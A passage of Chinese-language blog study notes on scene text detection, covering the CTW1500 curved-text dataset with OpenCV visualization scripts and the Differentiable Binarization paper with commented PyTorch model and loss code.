    cv2.circle(image, (p[0], p[1]), int(min(height, width) / 150), (0, 255, 255), -1)

    cv2.putText(image, transcriptions, (points[0][0], points[0][1] - int(min(height, width) / 150)), cv2.FONT_HERSHEY_SIMPLEX,
    min(height, width) / 1000, (0, 255, 0), int(min(height, width) / 500))

    fig, axes = plt.subplots(nrows=1, ncols=2, figsize=(16, 9))
    axes = axes.flatten()

    axes[0].imshow(cv2.cvtColor(image_origin, cv2.COLOR_BGR2RGB))
    axes[0].axis('off')
    axes[0].set_title('Origin')

    axes[1].imshow(cv2.cvtColor(image, cv2.COLOR_BGR2RGB))
    axes[1].axis('off')
    axes[1].set_title('Annotation')

    plt.tight_layout()
    plt.show()

    png

    ]]>
    + 资源

    正文

    Abstract

    提出了:

    • 一个数据集 CTW 1500(1000 张用于训练,500 张用于测试)

    • 基于该数据集提出了一种基于多边形的曲线文本检测器(CTD)

    1 Introduction

    png

    目前的数据集很少有曲线文本,用四边形标记这种文本是有缺陷的,更不用说矩形了。例如,如图 1 所示,使用曲线边界框有三个显著的优点:

    • 避免重叠
    • 减小背景噪声
    • 避免使用多个文本行

    对于所有类型的曲线文本区域,一个 14 点的多边形就足以定位它们。

    在所提出的数据集上,结果表明,具有轻度减少的 resnet-50 的 CTD 可以有效地检测曲线文本。

    目前的技术检测曲线文本都不好使。

    3. CTW1500 Dataset and Annotation

    Data decription

    数据描述。CTW1500 数据集包含

    • 1500 幅图像
    • 10751 个边界框(3530 个是曲线边界框)
    • 每幅图像至少一个曲线文本。
    • 多语言,主要包含中文和英文

    Annotation

    png

    为了包围曲线文本,我们创建了十条等距的参考线来帮助标记额外的 10 个点(我们实际上发现额外的 10 点足以标记所有类型的曲线文本)。我们使用等距线的原因是为了简化标注工作,并减少主观干扰。

    一个曲线文本比标记四边形文本消耗大约三倍的时间。

    4.1. Network Architecture

    png

    我们 CTD 的总体架构如图 4 所示,可分为三个部分:backbone、RPN 和 regression module。

    • backbone 通常采用 ImageNet 预先训练的流行模型,然后使用相应的模型进行微调,如 VGG-16、ResNet 等。区域建议网络(RPN)和回归模块分别连接到主干;
    • RPN 生成粗略回忆文本的建议;
    • regression module 对建议进行微调,使其更加紧凑。

    4.2. Recurrent Transverse and Longitudinal Offset Connection (TLOC)

    4.3. Long Side Interpolation

    4.4. Polygonal Post Processing

    非多边形抑制(NPS)。误报检测结果是制约文本检测性能的重要原因之一。

    多边形非最大值抑制(PNMS)。非极大值抑制被证明对目标检测任务非常有效。

    5. Experiments

    提出的模型有效。

    6. Conclusions and Future Work

    数据集

    Yuliang-Liu/Curve-Text-Detector: This repository provides train&test code, dataset, det.&rec. annotation, evaluation script, annotation tool, and ranking. (github.com) 下载数据集:

    • train_images.zip 训练集图像(1000 张)
    • ctw1500_train_labels.zip(训练集图像的标注文件,xml 格式)
    • test_images.zip 测试集图像(500 张)
    • gt_ctw1500.zip(测试集图像的标注文件,txt 格式)

    可视化训练集图像的代码:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    61
    62
    63
    64
    65
    66
    67
    68
    69
    70
    71
    72
    73
    74
    75
    76
    77
    78
    79
    80
    81
    82
    83
    84
    85
    86
    87
    88
    89
    import xml.etree.ElementTree as ET

    index = 997

    # 定义路径
    image_dir = r'E:\dataset\CTW1500\ctw1500\train_images\\'
    label_dir = r"E:\dataset\CTW1500\ctw1500\ctw1500_train_labels\\"

    image_path = os.path.join(image_dir, "{:04d}".format(index) + '.jpg')
    label_path = os.path.join(label_dir, "{:04d}".format(index) + '.xml')

    image_origin = cv2.imread(image_path)
    image = image_origin.copy()
    height, width, _ = image.shape

    # 解析 XML 文件
    tree = ET.parse(label_path)
    root = tree.getroot()

    # 遍历每个图像
    for image_elem in root.findall("image"):
    file_name = image_elem.get("file")

    # 遍历每个标注框
    for box_elem in image_elem.findall("box"):
    box_height = int(box_elem.get('height'))
    box_width = int(box_elem.get('width'))
    box_left = int(box_elem.get('left'))
    box_top = int(box_elem.get('top'))

    print(f"Box height: {box_height}")
    print(f"Box width: {box_width}")
    print(f"Box left: {box_left}")
    print(f"Box top: {box_top}")

    # 读取 <segs> 的值并以逗号分割成列表
    segs = box_elem.find('./segs')
    segs_values = segs.text.split(',')

    segs_x = []
    segs_y = []
    print("Segments:")
    for i in range(0, len(segs_values), 2):
    segs_x.append(int(segs_values[i]))
    segs_y.append(int(segs_values[i+1]))
    segs = np.array([segs_x, segs_y], np.int32).T
    print(f"segs_x: {segs_x}, y: {segs_y}")

    transcriptions = box_elem.find("label").text

    # 获取所有 pts 标签
    pts_elems = box_elem.findall("pts")

    # 提取坐标信息
    pts_x = []
    pts_y = []
    for pts_elem in pts_elems:
    pts_x.append(int(pts_elem.get("x")))
    pts_y.append(int(pts_elem.get("y")))
    pts = np.array([pts_x, pts_y], np.int32).T
    # 打印标注信息
    print("File: ", file_name)
    print("Transcriptions: ", transcriptions)
    print("Points: ", pts)

    # 画图
    cv2.rectangle(image, (box_left, box_top), (box_left + box_width, box_top + box_height), (255, 255, 0), thickness=2)
    cv2.polylines(image, [segs], isClosed=False, color=(255, 255, 255), thickness=2)
    cv2.polylines(image, [pts], isClosed=False, color=(255, 0, 0), thickness=2)

    for p in pts:
    cv2.circle(image, (p[0], p[1]), int(min(height, width) / 150), (0, 255, 255), -1)

    cv2.putText(image, transcriptions, (pts_x[0], pts_y[0] - int(min(height, width) / 150)), cv2.FONT_HERSHEY_SIMPLEX,
    min(height, width) / 1000, (0, 255, 0), int(min(height, width) / 500))

    fig, axes = plt.subplots(nrows=1, ncols=2, figsize=(16, 9))
    axes = axes.flatten()

    axes[0].imshow(cv2.cvtColor(image_origin, cv2.COLOR_BGR2RGB))
    axes[0].axis('off')
    axes[0].set_title('Origin')

    axes[1].imshow(cv2.cvtColor(image, cv2.COLOR_BGR2RGB))
    axes[1].axis('off')
    axes[1].set_title('Annotation')

    plt.tight_layout()
    plt.show()
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    61
    62
    63
    Box height: 108
    Box width: 565
    Box left: 201
    Box top: 351
    Segments:
    segs_x: [216, 302, 389, 476, 563, 651, 739, 766, 671, 576, 482, 388, 294, 201], y: [351, 383, 398, 407, 409, 391, 363, 406, 440, 458, 459, 451, 432, 398]
    File: 0997.jpg
    Transcriptions: VIOLENCE NEVER BRINGS
    Points: [[228 381]
    [245 390]
    [268 395]
    [289 406]
    [323 415]
    [352 422]
    [388 426]
    [417 431]
    [439 432]
    [473 436]
    [508 434]
    [540 433]
    [566 432]
    [601 429]
    [616 425]
    [634 421]
    [666 414]
    [683 406]
    [697 402]
    [722 392]
    [741 387]]
    Box height: 111
    Box width: 529
    Box left: 228
    Box top: 434
    Segments:
    segs_x: [251, 331, 411, 491, 571, 651, 731, 757, 669, 581, 493, 405, 316, 228], y: [437, 460, 474, 484, 479, 459, 434, 489, 528, 540, 545, 533, 522, 499]
    File: 0997.jpg
    Transcriptions: PERMANENT PEACE
    Points: [[259 475]
    [290 484]
    [319 487]
    [358 495]
    [396 505]
    [435 507]
    [472 511]
    [505 512]
    [543 513]
    [578 506]
    [613 499]
    [645 493]
    [682 481]
    [709 471]
    [731 464]]
    Box height: 96
    Box width: 37
    Box left: 466
    Box top: 127
    Segments:
    segs_x: [501, 501, 501, 502, 502, 502, 503, 466, 466, 466, 467, 467, 467, 468], y: [127, 143, 159, 175, 191, 207, 223, 220, 204, 189, 173, 158, 142, 127]
    File: 0997.jpg
    Transcriptions: LOC
    Points: [[486 141]
    [484 168]
    [485 205]]

    png

    可视化测试集图像的代码:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    import cv2
    import os
    import matplotlib.pyplot as plt

    index = 1200

    image_dir = r'E:\dataset\CTW1500\ctw1500\test_images\\'
    label_dir = r'E:\dataset\CTW1500\ctw1500\gt_ctw1500\\'

    image_path = os.path.join(image_dir, "{:04d}".format(index) + '.jpg')
    label_path = os.path.join(label_dir, "{:07d}".format(index) + '.txt')

    image_origin = cv2.imread(image_path)
    image = image_origin.copy()
    height, width, _ = image.shape
    label_file = open(label_path, 'r')
    annotations = label_file.readlines()
    label_file.close()

    for annotation in annotations:
    coords_text = annotation.strip().split(',####')
    coords = list(map(int, coords_text[0].split(',')))
    points = np.array([(coords[i], coords[i+1]) for i in range(0, len(coords), 2)])
    transcriptions = coords_text[1]

    cv2.polylines(image, [points], isClosed=True, color=(255, 0, 0), thickness=2)

    for p in points:
    cv2.circle(image, (p[0], p[1]), int(min(height, width) / 150), (0, 255, 255), -1)

    cv2.putText(image, transcriptions, (points[0][0], points[0][1] - int(min(height, width) / 150)), cv2.FONT_HERSHEY_SIMPLEX,
    min(height, width) / 1000, (0, 255, 0), int(min(height, width) / 500))

    fig, axes = plt.subplots(nrows=1, ncols=2, figsize=(16, 9))
    axes = axes.flatten()

    axes[0].imshow(cv2.cvtColor(image_origin, cv2.COLOR_BGR2RGB))
    axes[0].axis('off')
    axes[0].set_title('Origin')

    axes[1].imshow(cv2.cvtColor(image, cv2.COLOR_BGR2RGB))
    axes[1].axis('off')
    axes[1].set_title('Annotation')

    plt.tight_layout()
    plt.show()

    png

    ]]>
    @@ -5805,7 +5805,7 @@ /posts/Paper-Real-Time%20Scene%20Text%20Detection%20with%20Differentiable%20Binarization/ - 资源

    正文

    Abstract

    • 基于分割的场景文本检测(可以获得像素级别的预测)可以更精确地描述曲线文本等各种形状的场景文本
    • 二值化的后处理对于基于分割的检测至关重要,该检测将分割方法产生的概率图转换为文本的边界框/区域
    • 提出了一个名为可微分二值化(DB)的模块,它可以在分割网络中执行二值化过程
    • 好使。

    Introduction

    ​ 本文的主要贡献是提出了可微的 DB 模块,它使二值化过程在 CNN 中可以端到端训练。

    webp

    • 大多数现有的检测方法使用类似的后处理流水线,如图所示(蓝色箭头后面):
      • 首先,它们设置了一个固定的阈值,用于将分割网络生成的概率图转换为二值图像;
      • 然后,使用像素聚类等启发式技术将像素分组到文本实例中。
    • 或者,我们的流水线(如图中的红色箭头所示)旨在将二值化操作插入到分割网络中进行联合优化。通过这种方式,可以自适应地预测图像每个位置的阈值,这可以完全区分像素与前景和背景。然而,标准的二值化函数是不可微的,我们提出了一种称为可微分二值化(DB)的近似函数,当与分割网络一起训练时,它是完全可微的。

    ​本文的主要贡献是提出了可微分的 DB 模块,这使得二值化过程在 CNN 中端到端可训练

    ​ 最近的场景文本检测方法大致可以分为两类:基于回归(Regression-based)的方法和基于分割(Segmentation-based)的方法。

    • 基于回归 Regression 的方法是一系列直接回归文本实例的边界框的模型。

    • 基于分割 Segmentation 的方法通常结合像素级预测和后处理算法来获得边界框

    • 快速的场景文本检测方法注重准确性和推理速度。

    Methodology

    webp

    # -*- coding: utf-8 -*-
    # @Time : 2019/8/23 21:57
    # @Author : zhoujun
    from addict import Dict
    from torch import nn
    import torch.nn.functional as F

    from models.backbone import build_backbone
    from models.neck import build_neck
    from models.head import build_head


    class Model(nn.Module):
    def __init__(self, model_config: dict):
    """
    PANnet
    :param model_config: 模型配置
    """
    super().__init__()
    model_config = Dict(model_config) # 一个配置字典,用于指定模型的结构。转换为 Dict 对象,方便通过属性访问。
    # 从配置字典中提取 backbone、neck 和 head 的类型,并分别从配置中删除它们。
    backbone_type = model_config.backbone.pop('type')
    neck_type = model_config.neck.pop('type')
    head_type = model_config.head.pop('type')
    # 使用 build_backbone、build_neck 和 build_head 函数构建模型的不同部分。
    self.backbone = build_backbone(backbone_type, **model_config.backbone)
    self.neck = build_neck(neck_type, in_channels=self.backbone.out_channels, **model_config.neck)
    self.head = build_head(head_type, in_channels=self.neck.out_channels, **model_config.head)
    # self.name 存储了模型的名字,由 backbone、neck 和 head 的类型组合而成。
    self.name = f'{backbone_type}_{neck_type}_{head_type}'

    def forward(self, x):
    _, _, H, W = x.size() # x 是输入的张量,尺寸为 [batch_size, channels, height, width]。
    backbone_out = self.backbone(x) # 使用 self.backbone 处理输入,得到 backbone_out。
    neck_out = self.neck(backbone_out) # 使用 self.neck 处理 backbone_out,得到 neck_out。
    y = self.head(neck_out) # 使用 self.head 处理 neck_out,得到最终输出 y。
    y = F.interpolate(y, size=(H, W), mode='bilinear', align_corners=True) # F.interpolate 用于将输出 y 的尺寸调整为与输入 x 相同,以保持空间分辨率一致。
    return y # 最终返回调整后的 y。


    if __name__ == '__main__':
    import torch

    device = torch.device('cpu') # 创建一个 CPU 设备(可以改为 GPU)。
    x = torch.zeros(2, 3, 640, 640).to(device) # 创建一个大小为 [2, 3, 640, 640] 的零张量作为输入。

    model_config = {
    'backbone': {'type': 'resnest50', 'pretrained': True, "in_channels": 3},
    'neck': {'type': 'FPN', 'inner_channels': 256}, # 分割头,FPN or FPEM_FFM
    'head': {'type': 'DBHead', 'out_channels': 2, 'k': 50},
    }
    model = Model(model_config=model_config).to(device) # 初始化 Model 对象,传入配置字典。
    import time # 测量前向传播的时间。

    tic = time.time()
    y = model(x)
    # 打印出前向传播的时间、输出的形状、模型的名称和模型的详细结构。
    print(time.time() - tic)
    print(y.shape)
    print(model.name)
    print(model)
    #(可选)将模型的状态字典保存到文件 PAN.pth。
    # torch.save(model.state_dict(), 'PAN.pth')
    • resnet
    • MobilenetV3
    • shfflenetv2
    • FPN

      • 该代码实现了一个特征金字塔网络(FPN)的模块,主要用于融合来自不同尺度的特征图。它包括:

        • 特征图减少层:将每个特征图的通道数减少到较小的值。

        • 平滑层:对每一层的特征图进行平滑处理。

        • 融合和上采样:通过上采样和拼接不同层的特征图来增强特征表示。

        • 最终卷积:对融合后的特征图进行进一步处理,以生成最终的输出。

    import torch
    import torch.nn.functional as F
    from torch import nn

    from models.basic import ConvBnRelu


    class FPN(nn.Module):
    def __init__(self, in_channels, inner_channels=256, **kwargs):
    """
    :param in_channels: 基础网络输出的维度
    :param kwargs:
    """
    super().__init__()
    inplace = True
    self.conv_out = inner_channels
    inner_channels = inner_channels // 4 # 定义了在融合过程中的中间通道数。
    # reduce layers 是用于将不同层的特征图通道数减少到 inner_channels 的卷积层。
    self.reduce_conv_c2 = ConvBnRelu(in_channels[0], inner_channels, kernel_size=1, inplace=inplace)
    self.reduce_conv_c3 = ConvBnRelu(in_channels[1], inner_channels, kernel_size=1, inplace=inplace)
    self.reduce_conv_c4 = ConvBnRelu(in_channels[2], inner_channels, kernel_size=1, inplace=inplace)
    self.reduce_conv_c5 = ConvBnRelu(in_channels[3], inner_channels, kernel_size=1, inplace=inplace)
    # Smooth layers 平滑层,用于进一步处理不同层次的特征图。
    self.smooth_p4 = ConvBnRelu(inner_channels, inner_channels, kernel_size=3, padding=1, inplace=inplace)
    self.smooth_p3 = ConvBnRelu(inner_channels, inner_channels, kernel_size=3, padding=1, inplace=inplace)
    self.smooth_p2 = ConvBnRelu(inner_channels, inner_channels, kernel_size=3, padding=1, inplace=inplace)

    self.conv = nn.Sequential(
    nn.Conv2d(self.conv_out, self.conv_out, kernel_size=3, padding=1, stride=1),
    nn.BatchNorm2d(self.conv_out),
    nn.ReLU(inplace=inplace)
    ) # 是一个卷积层组合,用于处理最终融合后的特征图,包括卷积、批归一化和 ReLU 激活函数。
    self.out_channels = self.conv_out # 保存了输出特征图的通道数。

    def forward(self, x):
    c2, c3, c4, c5 = x # 是一个包含四个特征图的元组 (c2, c3, c4, c5),这些特征图来自基础网络的不同层。
    # Top-down
    p5 = self.reduce_conv_c5(c5)
    p4 = self._upsample_add(p5, self.reduce_conv_c4(c4))
    p4 = self.smooth_p4(p4)
    p3 = self._upsample_add(p4, self.reduce_conv_c3(c3))
    p3 = self.smooth_p3(p3)
    p2 = self._upsample_add(p3, self.reduce_conv_c2(c2))
    p2 = self.smooth_p2(p2)

    x = self._upsample_cat(p2, p3, p4, p5) # 将所有层的特征图在通道维度上进行拼接。
    x = self.conv(x) # 对拼接后的特征图进行最终处理,输出融合后的特征图。
    return x

    def _upsample_add(self, x, y):
    return F.interpolate(x, size=y.size()[2:]) + y # 将输入 x 上采样到与 y 相同的尺寸,并将其与 y 相加。

    def _upsample_cat(self, p2, p3, p4, p5): # 将 p2、p3、p4 和 p5 上采样到相同的尺寸,然后在通道维度上拼接它们。
    h, w = p2.size()[2:]
    p3 = F.interpolate(p3, size=(h, w))
    p4 = F.interpolate(p4, size=(h, w))
    p5 = F.interpolate(p5, size=(h, w))
    return torch.cat([p2, p3, p4, p5], dim=1)
    • ConvHead
      • ConvHead 是一个非常基础且常见的模块,通过一个 1x1 卷积层和 Sigmoid 激活函数对输入特征图进行变换。它主要用于生成最终的输出特征图,特别是在需要将特征图转换为概率图的任务中。
    import torch
    from torch import nn


    class ConvHead(nn.Module):
    def __init__(self, in_channels, out_channels,**kwargs):
    super().__init__()
    self.conv = nn.Sequential(
    # 一个卷积层,使用 1x1 的卷积核来对输入进行线性变换。这种卷积核的大小使得它主要作用于通道维度上的线性变换,而不改变空间维度(宽度和高度)。
    nn.Conv2d(in_channels=in_channels, out_channels=out_channels, kernel_size=1),
    # 一个激活函数,将卷积层的输出限制在 0 到 1 之间。这个函数通常用于需要输出概率值的任务,例如二分类问题或需要对特征图进行归一化处理的任务。
    nn.Sigmoid()
    )

    def forward(self, x):
    return self.conv(x)
    • DBHead
    import torch
    from torch import nn

    class DBHead(nn.Module):
    def __init__(self, in_channels, out_channels, k = 50):
    super().__init__()
    self.k = k # 用于前向传播时的步长函数的参数。
    self.binarize = nn.Sequential( # 一个生成二值图的顺序模块
    nn.Conv2d(in_channels, in_channels // 4, 3, padding=1), # 将通道数从 in_channels 降到 in_channels // 4,使用 3x3 的卷积核。
    nn.BatchNorm2d(in_channels // 4), # 批量归一化。
    nn.ReLU(inplace=True), # 非线性激活函数。
    nn.ConvTranspose2d(in_channels // 4, in_channels // 4, 2, 2), # 上采样特征图两次(空间维度翻倍)。
    nn.BatchNorm2d(in_channels // 4),
    nn.ReLU(inplace=True),
    nn.ConvTranspose2d(in_channels // 4, 1, 2, 2),
    nn.Sigmoid()) # 输出 0 到 1 之间的值,适用于二值图。
    self.binarize.apply(self.weights_init)

    self.thresh = self._init_thresh(in_channels) # 使用 _init_thresh 方法生成阈值图。
    self.thresh.apply(self.weights_init)

    def forward(self, x):
    shrink_maps = self.binarize(x) # binarize 模块的输出。
    threshold_maps = self.thresh(x) # thresh 模块的输出。
    if self.training: # 训练模式下
    binary_maps = self.step_function(shrink_maps, threshold_maps) # 使用 step_function 计算二值图。
    y = torch.cat((shrink_maps, threshold_maps, binary_maps), dim=1) # 将 shrink_maps、threshold_maps 和 binary_maps 连接在一起。
    else:
    y = torch.cat((shrink_maps, threshold_maps), dim=1)
    return y

    def weights_init(self, m): # 使用 He 初始化(kaiming_normal_)初始化卷积层的权重,并为批量归一化层设置特定的值。
    classname = m.__class__.__name__
    if classname.find('Conv') != -1:
    nn.init.kaiming_normal_(m.weight.data)
    elif classname.find('BatchNorm') != -1:
    m.weight.data.fill_(1.)
    m.bias.data.fill_(1e-4)

    def _init_thresh(self, inner_channels, serial=False, smooth=False, bias=False):
    # 创建一个生成阈值图的顺序模块。使用 nn.Conv2d、批量归一化、ReLU、上采样和 Sigmoid 激活。
    in_channels = inner_channels
    if serial:
    in_channels += 1
    self.thresh = nn.Sequential(
    nn.Conv2d(in_channels, inner_channels // 4, 3, padding=1, bias=bias),
    nn.BatchNorm2d(inner_channels // 4),
    nn.ReLU(inplace=True),
    self._init_upsample(inner_channels // 4, inner_channels // 4, smooth=smooth, bias=bias),
    nn.BatchNorm2d(inner_channels // 4),
    nn.ReLU(inplace=True),
    self._init_upsample(inner_channels // 4, 1, smooth=smooth, bias=bias),
    nn.Sigmoid())
    return self.thresh

    def _init_upsample(self, in_channels, out_channels, smooth=False, bias=False):
    # 定义上采样模块,使用邻近插值加卷积,或者使用转置卷积层。
    if smooth: # 平滑上采样
    inter_out_channels = out_channels
    if out_channels == 1:
    inter_out_channels = in_channels
    module_list = [
    nn.Upsample(scale_factor=2, mode='nearest'), # 使用 nn.Upsample 将输入的空间维度扩大一倍(使用最近邻插值)。
    nn.Conv2d(in_channels, inter_out_channels, 3, 1, 1, bias=bias)] # 接着应用 nn.Conv2d 层来对上采样后的特征图进行进一步处理。
    if out_channels == 1:
    # 如果 out_channels 等于 1,还会添加一个额外的 nn.Conv2d 层,以调整输出通道数。
    module_list.append(nn.Conv2d(in_channels, out_channels, kernel_size=1, stride=1, padding=1, bias=True))
    return nn.Sequential(module_list)
    else:
    # 直接使用 nn.ConvTranspose2d 层进行上采样(转置卷积),以实现空间维度的扩展。
    return nn.ConvTranspose2d(in_channels, out_channels, 2, 2)

    def step_function(self, x, y):
    # 应用步长函数生成二值图。此函数使用类似 sigmoid 的曲线来基于 x(收缩图)和 y(阈值图)的差异产生 0 到 1 之间的值。
    return torch.reciprocal(1 + torch.exp(-self.k * (x - y)))
    1. 输入图像输入到 feature-pyramid back-bone 中

    2. 金字塔特征被上采样到相同的尺度并级联以产生特征 $F$

    3. 特征 $F$ 被用于预测概率图 probability map $P$ 和阈值图 threshold map $T$

    4. DB 通过 $P$ 和 $F$ 计算近似二值映射,得到近似二值图 approximate binary map $\hat B$

    • 在 train 期间,监督应用于 $P$、$T$ 和 $\hat B$,其中 $P$ 和 $\hat B$ 共享相同的监督

    • 在 inference 期间,通过框公式化模块可以容易地从 $\hat B$ 或 $P$ 中获得边界框

    Binarization

    Standard binarization

    ​ 就是一刀切。

    $$B_{i,j}=\left{\begin{matrix} 1 & \mathrm{if}\ P_{i,j}>=t\ 0 & \mathrm{otherwise.}\end{matrix}\right.$$

    ​ 给定由分割网络产生的概率图 $P\in R^{H\times W}$,其中 $H$ 和 $W$ 表示图的高度和宽度,必须将其转换为二值图 $P\in R^{H\times W}$,其中值为 $1$ 被认为是有效的文本区域。其中 $t$ 是预定义的阈值,$(i,j)$ 表示 map 中的坐标点。

    Differentiable binarization

    ​ 上式不可微分,在 train 过程中就不可以与分割网络一起进行优化,因此,我们建议使用阶跃函数进行二值化:

    $$\hat B_{i,j}=\frac{1}{1+e^{-k(P_{i,j}-T_{i,j})}}$$

    ​ 其中 $\hat B$ 是近似二进制映射;$T$ 是从网络学习的自适应阈值映射;$k$ 表示放大因子。$k$ 根据经验设置为 50。

    def step_function(self, x, y):
    return torch.reciprocal(1 + torch.exp(-self.k * (x - y)))
    # 这个 step_function 就是 Differentiable binarization 的公式

    webp

    DB 的 k 越大,越接近于 Standard Binarization

    ​DB 提高性能的原因可以通过梯度的反向传播来解释。以二元交叉熵损失为例。定义 $f(x)=\frac{1}{1+e^{-kx}}$ 作为我们的 DB 函数,其中 $x=P_{i,j}-T_{i,j}$。那么正标签的损失 $l_{+}$ 和负标签的损失 $l_{−}$ 分别为:

    $$l_{-}=-\log\left(1-\frac{1}{1+e^{-kx}}\right)$$

    ​我们可以很容易地用链式法则计算损失的微分:

    $$\begin{aligned}&\frac{\partial l_+}{\partial x}=-kf(x)e^{-kx}\&\frac{\partial l_-}{\partial x}=kf(x)\end{aligned}$$

    ​$l_{+}$ 和 $l_{−}$ 的微分中我们可以看出:

    1. 梯度被放大因子 $k$ 放大;
    2. 梯度的放大对于大多数错误预测的区域都是显著的(对于 $L_+$,$x < 0$;对于 $L_-$,$x > 0$),从而有利于优化,并有助于产生更独特的预测。此外,当 $x = P_{i,j} − T_{i,j}$ 时,$P$ 的梯度在前景和背景之间受到 $T$ 的影响和重新缩放。

    Adaptive threshold

    ​ 自适应阈值。

    Deformable convolution

    可变形卷积可以为模型提供灵活的感受野,这对极端长宽比的文本实例尤其有益。接下来,在 ResNet-18 或 ResNet-50 主干中的 conv3、conv4 和 conv5 阶段,在所有 3×3 卷积层中应用调制可变形卷积。

    Label generation

    webp

    Label generation。文本多边形的注释以红线显示。收缩和展开的多边形分别显示为蓝线和绿线

    ​ 概率图的标签生成受到 PSENet 的启发。给定一个文本图像,其文本区域的每个多边形由一组线段描述:

    $$G={S_k}^n_{k=1}$$

    ​ $n$ 是顶点的数量,在不同的数据集中可能不同,例如,ICDAR 2015 数据集为 4(Karatzas 等人),CTW1500 数据集为 16。

    ​ 通过使用 Vatti 剪裁算法将多边形 $G$ 缩小为 $G_s$ 来生成正区域。收缩的偏移量 $D$ 是根据原始多边形的周长 $L$ 和面积 $A$ 计算得出的:

    $$D=\frac{A(1-r^2)}{L}$$

    ​ 其中 $r$ 是收缩率,根据经验设置为 0.4。

    ​ 通过类似的过程,我们可以为阈值映射生成标签。首先,将文本多边形 $G$ 以与 $G_d$ 相同的偏移量 $D$ 展开。我们将 $G_s$ 和 $G_d$ 之间的间隙视为文本区域的边界,其中可以通过计算到 $G$ 中最近线段的距离来生成阈值图的标签。


    ​在 data_loader 中实现。

    • 根据人工标记的 gt 框(一系列坐标点),进行一些膨胀(dilate)和缩小(shrink)的操作
    • 做一些 gt 框内的计算来得到 probability_mapthreshold_map

    Optimization

    ​ 损失函数 $L$ 可以表示为概率映射 $L_s$ 的损失、二进制映射 $L_b$ 的损失和阈值映射 $L_t$ 的损失的加权和

    $$L=L_s+\alpha\times L_b+\beta\times L_t$$

    ​ $\alpha$ 和 $\beta$ 分别取 1.0 和 10。

    ​ 对 $L_s$ 和 $L_b$ 都应用了二进制交叉熵(BCE)损失:

    $$L_s=L_b=\Sigma_{i\in S_l}y_i\log x_i+(1-y_i)\log(1-x_i)$$

    class BalanceCrossEntropyLoss(nn.Module):
    # 这个损失函数是交叉熵损失的一个平衡版本,用于处理类不平衡问题。它在计算损失时对正样本和负样本进行不同的加权,以便在训练时能更好地处理类别不平衡的情况。
    '''
    Balanced cross entropy loss.
    Shape:
    - Input: :math:`(N, 1, H, W)`
    - GT: :math:`(N, 1, H, W)`, same shape as the input
    - Mask: :math:`(N, H, W)`, same spatial shape as the input
    - Output: scalar.

    Examples::

    >>> m = nn.Sigmoid()
    >>> loss = nn.BCELoss()
    >>> input = torch.randn(3, requires_grad=True)
    >>> target = torch.empty(3).random_(2)
    >>> output = loss(m(input), target)
    >>> output.backward()
    '''

    def __init__(self, negative_ratio=3.0, eps=1e-6):
    # negative_ratio:一个负样本的比例,默认值为 3.0,表示负样本的数量是正样本数量的 3 倍。
    # eps: 一个小的常数(1e-6),用于避免除零错误。
    super(BalanceCrossEntropyLoss, self).__init__()
    self.negative_ratio = negative_ratio
    self.eps = eps

    def forward(self,
    pred: torch.Tensor, # pred: 网络的预测值,形状为 (N, 1, H, W)。
    gt: torch.Tensor, # 目标值,形状同 pred。
    mask: torch.Tensor, # 掩码,形状为 (N, H, W),用来指示正样本区域。
    return_origin=False):
    '''
    Args:
    pred: shape :math:`(N, 1, H, W)`, the prediction of network
    gt: shape :math:`(N, 1, H, W)`, the target
    mask: shape :math:`(N, H, W)`, the mask indicates positive regions
    '''
    # 计算正样本和负样本的数量,并使用负样本比例限制负样本的数量。
    positive = (gt * mask).byte()
    negative = ((1 - gt) * mask).byte()
    positive_count = int(positive.float().sum())
    negative_count = min(int(negative.float().sum()), int(positive_count * self.negative_ratio))
    loss = nn.functional.binary_cross_entropy(pred, gt, reduction='none')
    # 计算每个位置的二进制交叉熵损失。
    positive_loss = loss * positive.float()
    negative_loss = loss * negative.float()
    # negative_loss, _ = torch.topk(negative_loss.view(-1).contiguous(), negative_count)
    # 对正样本和负样本分别计算损失,然后将负样本的损失限制为一定的数量。
    negative_loss, _ = negative_loss.view(-1).topk(negative_count)

    # 最终计算加权的总损失并返回。
    balance_loss = (positive_loss.sum() + negative_loss.sum()) / (positive_count + negative_count + self.eps)

    if return_origin:
    return balance_loss, loss
    return balance_loss

    ​ $L_t$ 被计算为扩展文本多边形 $G_d$ 内的预测和标签之间的 $L_1$ 距离之和:

    $$L_t=\Sigma_{i\in R_d}|y*_i-x*_i|$$

    class MaskL1Loss(nn.Module):
    # 这是一个基于 L1 损失的变体,结合了掩码,仅在感兴趣的区域计算损失。
    def __init__(self, eps=1e-6):
    super(MaskL1Loss, self).__init__()
    self.eps = eps

    def forward(self, pred: torch.Tensor, gt, mask):
    # 计算预测值和真实值之间的绝对差异,并根据掩码计算加权和。
    loss = (torch.abs(pred - gt) * mask).sum() / (mask.sum() + self.eps)
    return loss

    ​ 在推理阶段,我们可以使用概率图或近似二进制图来生成文本边界框,这会产生几乎相同的结果。

    $$D’=\frac{A’\times r’}{L’}$$

    ​ 其中 $A’$ 是收缩多边形的面积;$L’$ 是收缩多边形的周长;$r’$ 根据经验设定为 1.5。

    DB_loss.py

    from torch import nn

    from models.losses.basic_loss import BalanceCrossEntropyLoss, MaskL1Loss, DiceLoss


    class DBLoss(nn.Module):
    def __init__(self, alpha=1.0, beta=10, ohem_ratio=3, reduction='mean', eps=1e-6):
    """
    Implement PSE Loss.
    :param alpha: binary_map loss 前面的系数
    :param beta: threshold_map loss 前面的系数
    :param ohem_ratio: OHEM 的比例
    :param reduction: 'mean' or 'sum'对 batch 里的 loss 算均值或求和
    """
    super().__init__()
    assert reduction in ['mean', 'sum'], " reduction must in ['mean','sum']"
    # alpha 和 beta 是控制不同损失项权重的系数。
    self.alpha = alpha
    self.beta = beta
